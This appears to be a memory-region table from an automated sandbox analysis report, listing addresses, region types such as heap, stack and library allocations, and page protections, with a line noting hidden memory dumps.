1DFCC899000
|
heap
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
1EFDA56D000
|
heap
|
page read and write
|
||
2B644F9000
|
stack
|
page read and write
|
||
2B63D83000
|
stack
|
page read and write
|
||
DB2000
|
heap
|
page read and write
|
||
D4E2F3E000
|
stack
|
page read and write
|
||
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
17B33542000
|
trusted library allocation
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
7FFD9B964000
|
trusted library allocation
|
page read and write
|
||
1C5E0000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
1232000
|
heap
|
page read and write
|
||
8E0000
|
unkown
|
page readonly
|
||
1EFC309E000
|
trusted library allocation
|
page read and write
|
||
2B6477B000
|
stack
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
17B30D53000
|
heap
|
page read and write
|
||
C66778000
|
stack
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
2CDA000
|
trusted library allocation
|
page read and write
|
||
17B30FC0000
|
heap
|
page read and write
|
||
7FFD9B922000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB8C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
17B33EB7000
|
trusted library allocation
|
page read and write
|
||
1F76B490000
|
heap
|
page read and write
|
||
7FFD9BAC9000
|
trusted library allocation
|
page read and write
|
||
742000
|
heap
|
page read and write
|
||
1DFB27D0000
|
heap
|
page read and write
|
||
C6693A000
|
stack
|
page read and write
|
||
7DF4AA7B0000
|
trusted library allocation
|
page execute and read and write
|
||
E2F000
|
heap
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
D4E2EF9000
|
stack
|
page read and write
|
||
17B33D05000
|
trusted library allocation
|
page read and write
|
||
2B6407E000
|
stack
|
page read and write
|
||
1F76D945000
|
heap
|
page read and write
|
||
1F76B516000
|
heap
|
page read and write
|
||
DDE000
|
heap
|
page read and write
|
||
7FFD9BACC000
|
trusted library allocation
|
page read and write
|
||
45ECC7D000
|
stack
|
page read and write
|
||
1F76D93D000
|
heap
|
page read and write
|
||
17B30F30000
|
heap
|
page read and write
|
||
17B4B185000
|
heap
|
page read and write
|
||
17B4AF28000
|
heap
|
page read and write
|
||
D4E2E7E000
|
stack
|
page read and write
|
||
2CB2000
|
trusted library allocation
|
page read and write
|
||
2C8A000
|
trusted library allocation
|
page read and write
|
||
660000
|
heap
|
page read and write
|
||
2CC1000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
17B30D7E000
|
heap
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
1C8EA000
|
stack
|
page read and write
|
||
17B336FD000
|
trusted library allocation
|
page read and write
|
||
1F76D983000
|
heap
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
1EFC2DC6000
|
trusted library allocation
|
page read and write
|
||
1F76B4CC000
|
heap
|
page read and write
|
||
1F710021000
|
trusted library allocation
|
page read and write
|
||
1F76D5A0000
|
heap
|
page execute and read and write
|
||
1DFCCC80000
|
heap
|
page read and write
|
||
45ECDB7000
|
stack
|
page read and write
|
||
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
D4E28F3000
|
stack
|
page read and write
|
||
2B640FE000
|
stack
|
page read and write
|
||
1DFB5723000
|
trusted library allocation
|
page read and write
|
There are 985 hidden memdumps, click here to show them.